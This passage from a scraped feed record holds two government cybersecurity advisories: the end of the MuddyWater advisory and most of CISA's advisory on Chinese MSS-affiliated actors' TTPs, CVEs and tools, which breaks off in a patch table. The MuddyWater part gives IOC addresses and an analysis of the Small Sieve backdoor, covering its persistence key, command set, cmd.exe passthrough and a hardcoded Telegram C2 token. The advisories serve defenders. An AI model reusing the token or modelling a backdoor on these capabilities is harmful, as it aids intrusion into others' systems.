References\n\n[[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>) \n[[2] MITRE ATT&amp;CK: MuddyWater ](<https://attack.mitre.org/versions/v10/groups/G0069/>)\n\n### Caveats\n\nThe information you have accessed or received is being provided \u201cas is\u201d for informational purposes only. The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.\n\n### Purpose\n\nThis document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States\u2019 NSA agrees with this attribution and the details provided in this report.\n\n### Appendix A: IOCs\n\nThe following IP addresses are associated with MuddyWater activity:\n\n`5.199.133[.]149 \n45.142.213[.]17 \n45.142.212[.]61 \n45.153.231[.]104 \n46.166.129[.]159 \n80.85.158[.]49 \n87.236.212[.]22 \n88.119.170[.]124 \n88.119.171[.]213 \n89.163.252[.]232 \n95.181.161[.]49 \n95.181.161[.]50 \n164.132.237[.]65 \n185.25.51[.]108 \n185.45.192[.]228 \n185.117.75[.]34 \n185.118.164[.]21 \n185.141.27[.]143 \n185.141.27[.]248 \n185.183.96[.]7 \n185.183.96[.]44 \n192.210.191[.]188 \n192.210.226[.]128`\n\n### Appendix B: Small Sieve\n\n**Note:** the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.\n\n#### **Metadata**\n\n_Table 2: Gram.app.exe Metadata_\n\nFilename | gram_app.exe** ** \n---|--- \n**Description** | NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key \n**Size** | 16999598 bytes \n**MD5** | 15fa3b32539d7453a9a85958b77d4c95 \n**SHA-1** | 11d594f3b3cf8525682f6214acb7b7782056d282 \n**SHA-256** | b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054 \n**Compile Time** | 2021-09-25 21:57:46 UTC \n \n_Table 3: Index.exe Metadata_\n\nFilename | index.exe \n---|--- \n**Description** | The final PyInstaller-bundled Python 3.9 backdoor \n**Size** | 17263089 bytes \n**MD5** | 5763530f25ed0ec08fb26a30c04009f1 \n**SHA-1** | 2a6ddf89a8366a262b56a251b00aafaed5321992 \n**SHA-256** | bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2 \n**Compile Time** | 2021-08-01 04:39:46 UTC \n \n#### \n\n#### **Functionality **\n\n##### **_Installation _**\n\nSmall Sieve is distributed as a large (16MB) NSIS installer named `gram_app.exe`, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary `index.exe` is installed in the user\u2019s `AppData/Roaming` directory and is added as a Run key in the registry to enabled persistence after reboot. \n\nThe installer then executes the backdoor with the \u201cPlatypus\u201d argument [[T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>)], which is also present in the registry persistence key: `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift`. \n\n##### **_Configuration _**\n\nThe backdoor attempts to restore previously initialized session data from `%LocalAppData%\\MicrosoftWindowsOutlookDataPlus.txt`. \n\nIf this file does not exist, then it uses the hardcoded values listed in table 4:\n\n_Table 4: Credentials and Session Values_\n\nField | **Value** | **Description** \n---|---|--- \nChat ID | 2090761833 | This is the Telegram Channel ID that beacons are sent to, and, from which, tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed. \nBot ID | Random value between 10,000,000 and 90,000,000 | This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with `/com[Bot ID]` in order to be processed by the malware. \nTelegram Token | 2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY | This is the initial token used to authenticate each message to the Telegram Bot API. \n \n#### \n\n#### **Tasking **\n\nSmall Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host\u2019s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the** python-telegram-bot** module. \n\nTwo task formats are supported: \n\n * `/start `\u2013 no argument is passed; this causes the beacon information to be repeated. \n * `/com[BotID] [command]` \u2013 for issuing commands passed in the argument. \n\nThe following commands are supported by the second of these formats, as described in table 5: \n\n_Table 5: Supported Commands_\n\nCommand | Description \n---|--- \ndelete | This command causes the backdoor to exit; it does not remove persistence. \ndownload **url\u201d\u201dfilename** | The URL will be fetched and saved to the provided filename using the Python urllib module `urlretrieve` function. \nchange token**\u201d\u201dnewtoken** | The backdoor will reconnect to the Telegram Bot API using the provided token `newtoken`. This updated token will be stored in the encoded `MicrosoftWindowsOutlookDataPlus.txt` file. \ndisconnect | The original connection to Telegram is terminated. It is likely used after a `change token` command is issued. \n \nAny commands other than those detailed in table 5 are executed directly by passing them to `cmd.exe /c`, and the output is returned as a reply.\n\n#### **Defense Evasion **\n\n##### **_Anti-Sandbox _**\n\n##### \n\n_Figure 1: Execution Guardrail_\n\nThreat actors may be attempting to thwart simple analysis by not passing \u201cPlatypus\u201d on the command line. \n\n##### **_String obfuscation _**\n\nInternal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included in Appendix B.\n\n#### **Communications **\n\n##### **_Beacon Format _**\n\nBefore listening for tasking using CommandHandler objects from the python`-telegram-bot `module, a beacon is generated manually using the standard `requests` library:\n\n\n\n_Figure 2: Manually Generated Beacon_\n\nThe hex host data is encoded using the byte shuffling algorithm as described in the \u201cCommunications (Traffic obfuscation)\u201d section of this report. The example in figure 2 decodes to: \n\n`admin/WINDOMAIN1 | 10.17.32.18`\n\n##### \n\n##### _**Traffic obfuscation **_\n\nAlthough traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.\n\n\n\n_Figure 3: Traffic Encoding Scheme Based on Hex Conversion and Shuffling_\n\n#### \n\n#### **Detection **\n\nTable 6 outlines indicators of compromise. \n\n\n_Table 6: Indicators of Compromise_\n\nType | Description | **Values** \n---|---|--- \nPath | Telegram Session Persistence File (Obfuscated) | `%LocalAppData%\\MicrosoftWindowsOutlookDataPlus.txt ` \nPath | Installation path of the Small Sieve binary | `%AppData%\\OutlookMicrosift\\index.exe ` \nRegistry value name | Persistence Registry Key pointing to index.exe with a `\u201cPlatypus\u201d `argument | `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift` \n \n#### \n\n#### **String Recover Script**\n\n\n\n_Figure 4: String Recovery Script_\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>). For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). United Kingdom organizations should report a significant cyber security incident: [ncsc.gov.uk/report-an-incident](<https://www.ncsc.gov.uk/section/about-this-website/contact-us>) (monitored 24 hours) or for urgent assistance call 03000 200 973.\n\n### Revisions\n\nFebruary 24, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T12:00:00", "type": "ics", "title": "Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2022-02-24T12:00:00", "id": "AA22-055A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-055a", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:20", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) and Pre-ATT&amp;CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&amp;CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&amp;CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. \n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a >)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a >)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a >)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a >)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). \n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. \n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&amp;CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com >)][[11](<https://exploit-db.com >)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/ >)] \n \nThe following sections list the ATT&amp;CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. \n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n 